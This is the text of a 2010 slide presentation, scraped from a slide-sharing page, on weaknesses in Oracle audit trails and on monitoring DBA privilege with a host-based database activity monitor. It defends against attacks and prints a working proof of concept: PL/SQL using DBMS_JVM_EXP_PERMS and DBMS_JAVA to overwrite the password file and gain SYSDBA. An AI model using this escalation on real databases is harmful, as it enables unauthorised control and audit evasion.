Скачать презентацию Securely Recording The Use of Privilege In Oracle Скачать презентацию Securely Recording The Use of Privilege In Oracle

83f9e5b4fd41924cca259c9342ea99f2.ppt

  • Количество слайдов: 25

Securely Recording The Use of Privilege In Oracle Databases Paul M. Wright June 2010 Securely Recording The Use of Privilege In Oracle Databases Paul M. Wright June 2010 for Sentrigo 1

Overview of presentation • State of database auditing today. • Problems with Oracle audit Overview of presentation • State of database auditing today. • Problems with Oracle audit >> demo! • Solution >> Database Application Activity Monitoring Systems (DAMS). • SAS 70 project I completed in the financial services using Hedgehog DAMS. • Advanced DAMS usage: – Fix Java zero days in Oracle – Verifying DBA change tickets using DAMS – Record and protect use of DBA privilege • Future of DAMS.

State of Database auditing today Database auditing is before the wheel. . . If State of Database auditing today Database auditing is before the wheel. . . If we consider the security monitoring of a bank vault… 3

DB is the modern Bank Vault • Do bank managers say things like - DB is the modern Bank Vault • Do bank managers say things like - “I am sorry, but we can not monitor the vault today because it may become too slow to use? • Of course not but. . – DBs are NOT monitored due to performance concerns. • Does the Bank Manager get to switch off the cameras in the vault when they want? – DBA privilege is enough to turn off Database auditing. • An organisation's data can be as valuable as money kept in a vault. • But the ability to securely record access has not been widely available. 4

Known problems with Oracle Audit • SYSDBA privilege can modify audit in SYS. AUD$ Known problems with Oracle Audit • SYSDBA privilege can modify audit in SYS. AUD$ • OSDBA privilege can modify. aud files in $ORACLE_HOME/rdbms/audit • Low priv accounts can escalate to SYSDBA. • There are new ways for low privileged accounts to evade audit, with Oracle currently. • Revoking execute on DBMS_SYS_SQL helps reduce some of the risk. • But surely Syslog audit in 10. 2 and 11 g is now secure? 5

How secure is Syslog audit? • In >= 10. 2 AUDIT_SYSLOG_LEVEL sends audit to How secure is Syslog audit? • In >= 10. 2 AUDIT_SYSLOG_LEVEL sends audit to Syslog remotely or locally to /var/log/secure which is only accessible to root. [[email protected] ~]$ cat /var/log/secure cat: /var/log/secure: Permission denied [[email protected] ~]$ su - root Password: [[email protected] ~]# cat /var/log/secure. May 17 16: 51: 39 linuxbox su: pam_unix(su-l: session): • When AUDIT_SYSLOG_LEVEL is set and AUDIT_SYS_OPERATIONS set to TRUE then all SYS* operations are recorded to /var/log/messages even if AUDIT_TRAIL is set to NONE! • Or if AUDIT_TRAIL is set to DB then SYS* actions still go to Syslog and non-SYS* actions go to SYS. AUD$. • This has been incorrectly recommended as secure by a number of authors. • Ok. . Syslog is an improvement on traditional Oracle OS audit via *. aud files which are accessible from the oracle unix account. . • If DBA accounts do not have root access then AUDIT_SYSLOG_LEVEL parameter can provide some separation of duty between UNIX sysadmin root and Oracle DBA/OSDBA accounts. 6

Effective Audit has to be external • Banking separates root access from DBA account. Effective Audit has to be external • Banking separates root access from DBA account. • So value in using AUDIT_SYSLOG_LEVEL ? • But code ran as SYS can still turn off the audit trail as audit is controlled from the DB! • The act of turning off Oracle audit can be hidden. • The only evidence of escalation to SYS would be a mandatory audit entry showing the SYS connection and DB restart. i. e. routine entries >> ignored. . • Low priv user can bypass audit using DBMS_SYS_SQL • Effective audit has to be external >> DEMO 7

External audit solution is DAMS • • • DAMS =External audit outside of DBA External audit solution is DAMS • • • DAMS =External audit outside of DBA privs. Either Host based on OS of DB, App/WWW. Or Network based appliance on a tap. Both Alert to SQL queries and session info. Enables us to see into the black box of the DB. How do these two methods compare? 8

Host vs network based DAMS • Host based has the following advantages: – – Host vs network based DAMS • Host based has the following advantages: – – – – • Read encrypted/obfuscated exploits. Recognise schemas when not specified. See through a synonym using object keyword. Trace dependencies between packages. Read SSH’d connections. Monitor local bequeath connections from OS. Cannot be turned off by OSDBA/SYSDBA privs Common objections to host-based agents from DBAs are that agents can be: – Unreliable. – Resource intensive. – Add complexity to an already complex system. Also Monitors DBAs which they might not like. • In my experience on recent 1. 5 year SAS 70 project Sentrigo Hedgehog is reliable and performant. 9

SAS 70 Project Overview • • Financial services SAS 70 project. Gained compliance with SAS 70 Project Overview • • Financial services SAS 70 project. Gained compliance with Sentrigo Hedgehog • • • IDS and IPS with prewritten rules User activity monitoring and alerting. Low CPU ~ less than 1% High reliability. Did not affect workings of the DB itself. Project published by UKOUG. Champagne all round. 10

DAMS Server Implementation 11 DAMS Server Implementation 11

Production CPU% of HH sensor 12 Production CPU% of HH sensor 12

Published by UKOUG Nov 2009 SAS 70 Sentrigo Hedgehog DAMS project was published in Published by UKOUG Nov 2009 SAS 70 Sentrigo Hedgehog DAMS project was published in UKOUG SCENE Journal (Nov 2009) and highlighted positively within the Editorial below. 13

Advanced DAMS usage Installation, setup and testing was reasonably straightforward. Then extended with Advanced Advanced DAMS usage Installation, setup and testing was reasonably straightforward. Then extended with Advanced DAMS usage… 1. Fixed Java priv zero days before patch by scoping effect of change beforehand by using DAMS. 2. Verified DBA change tickets afterwards using DAMS. Benefits: • • • Faster QA process = Competitive advantage Lower risk Prod changes = more resilient systems Protection of the DBA privilege = more security

How to fix Java zero days? • I received advanced notification of Hacking Aurora How to fix Java zero days? • I received advanced notification of Hacking Aurora in 11 g by David Litchfield. • Zero days. No patch. • Exploit code could be released any day. • Analysed the exploit code and defined a fix. • Revoke public execute from a number of PL/SQL packages and Java classes. • But what about the effects of that fix on the rest of the applications? • This is really a change management problem. 15

Change management methodology • How does change management usually work? • Rely on devs Change management methodology • How does change management usually work? • Rely on devs to understand effects of change. • Problems are – complexity – lack of communication and clear documentation – political fiefdoms in an organisation protect their part of the app. • • Common solution is to use time delay before changes. If a change does not break QA for a month put in Production. But this is slow and could miss bugs. What about using Hedgehog to enable safe fix testing? • If we can see how an DB/application mechanism works using a DAMS we can predict the effect of a fix 16

PL/SQL Java privilege escalation • • • Po. C code is adapted so that PL/SQL Java privilege escalation • • • Po. C code is adapted so that it works on 10 g. I was first to publish that it also affected 10. 2. 0. 4. 3 It grants privileges to execute any file on the OS which is owned by Oracle. SQL> DECLARE 2 POL DBMS_JVM_EXP_PERMS. TEMP_JAVA_POLICY; 3 CURSOR C 1 IS SELECT 'GRANT', USER(), 'SYS', 'java. io. File. Permission', '<>', 'execute', 'ENABLED' FROM DUAL; 4 BEGIN 5 OPEN C 1; 6 FETCH C 1 BULK COLLECT INTO POL; 7 CLOSE C 1; 8 DBMS_JVM_EXP_PERMS. IMPORT_JVM_PERMS(POL); 9 END; 10 / DECLARE * ERROR at line 1: ORA-29532: Java call terminated by uncaught Java exception: java. lang. Security. Exception: policy table update java. lang. Runtime. Permission, load. Library. * ORA-06512: at "SYS. DBMS_JVM_EXP_PERMS", line 189 ORA-06512: at line 8 17

How to use Java priv to gain SYSDBA Po. C code which uses that How to use Java priv to gain SYSDBA Po. C code which uses that execute privilege to gain SYSDBA on 11 g --Backup the password file: SELECT DBMS_JAVA. RUNJAVA('oracle/aurora/util/Wrapper mv /u 01/app/oracle/product/11. 2. 0/db_1/dbs/orapw. DB 11 Gbu')fro m dual; --Recreate the password file with known password: SELECT DBMS_JAVA_TEST. FUNCALL('oracle/aurora/util/Wrapper', 'm ain', '/u 01/app/oracle/product/11. 2. 0/db_1/bin/orapwd', 'file=/u 01/app/oracle/product/11. 2. 0/db_1/dbs/orapw. DB 11 G', 'password=attackersyspassword') from dual; sqlplus /nolog conn sys/[email protected] 168. 1. 2/DB 11 G as sysdba 18

Revoke PUBLIC execute For < 10. 2. 0. 4. 4 this is the main Revoke PUBLIC execute For < 10. 2. 0. 4. 4 this is the main revoke: revoke execute on sys. dbms_jvm_exp_perms from PUBLIC; • But what is the effect of this revoke on the rest of the DB and applications that access it? • How do I scope before making the change? • Used normal static analysis of source code and consult with devs and DBAs. • DAMS rules to record access to vulnerable packages. 19

4. Hedgehog Rules monitor vulns Before revoke done check DBMS_JVM_EXP_PERMS not used with HH 4. Hedgehog Rules monitor vulns Before revoke done check DBMS_JVM_EXP_PERMS not used with HH --Records successful executions of SYS. DBMS_JVM_EXP_PERMS Object=‘SYS. DBMS_JVM_EXP_PERMS’; --Records strings containing ‘DBMS_JVM_EXP_PERMS’ ( includes failed attempts). Statement contains ‘DBMS_JVM_EXP_PERMS’; --Test the queries with a stimulus to make sure they work. Select ‘DBMS_JVM_EXP_PERMS’from dual; 1. Wait for alerts to be generated. 2. No alerts recorded even when using datapump. 3. So can do the revokes with low risk. Can do the same for other packages such as SYS. DBMS_SYS_SQL 20

Securing Java In Oracle • Could use this method for all Java classes in Securing Java In Oracle • Could use this method for all Java classes in DB to scope removing the JVM completely. • DBMS_JAVA and DBMS_JAVA_TEST do not have the public execute revoked in latest CPU for 11 g. • The vulnerability is dealt with only by revoking public execute from oracle/aurora/util/Wrapper • So attacker could use a different vector for DBMS_JAVA. • For example attacker could write their own Wrapper class if they had CREATE PROCEDURE privilege. 21

Verifying Change Tickets Main aim is to monitor the DBA privilege not the DBA Verifying Change Tickets Main aim is to monitor the DBA privilege not the DBA person • The vast majority of DBAs are honest and very hard working. • But low priv accounts can be escalated to DBA • With HH we are protecting the DBA’s privilege by – Accurately recording DBA privilege usage – Cross reference DAMS alert to JIRA change ticket number in the change SQL. – Escalate alert if there is no change ticket for the DDL event recorded in HH. • Can only do this when DAMS has a forensic level of accuracy. 22 i. e. No false positives!

Results of Project for the Business 1. DAMS installation gained SAS 70 compliancy. 2. Results of Project for the Business 1. DAMS installation gained SAS 70 compliancy. 2. Protection of knowing not exploited. 3. QA to production process had lower risk. 4. Halve the time fixes spent in QA. 5. Fixed zero days before Oracle patched. 6. Verification of change tickets. 7. SYS privilege usage protected and recorded. 23

Where is this leading? 1. 2. 3. 4. First we had IDS/IPS… SANS. Then Where is this leading? 1. 2. 3. 4. First we had IDS/IPS… SANS. Then User/App activity Monitoring and DAMS Now DAMS change management integration Next stage is automated proactive state checking of code, configuration and user privileges on remote hosts from central state repository. – – – Repscan/PFCLScan be used for these purposes. Alert to regression of previous vulnerabilities. Verification that policy is being kept to. 24

Summary • In addition to IPS and account activity monitoring. – DAMS can be Summary • In addition to IPS and account activity monitoring. – DAMS can be used to shorten the SDLC. – Reduce risk of development changes. – Bringing transparency to the workings of the database application mechanism. • Host based DAMS provide the best method of securely recording the use of privilege in the Oracle database. • Questions? 25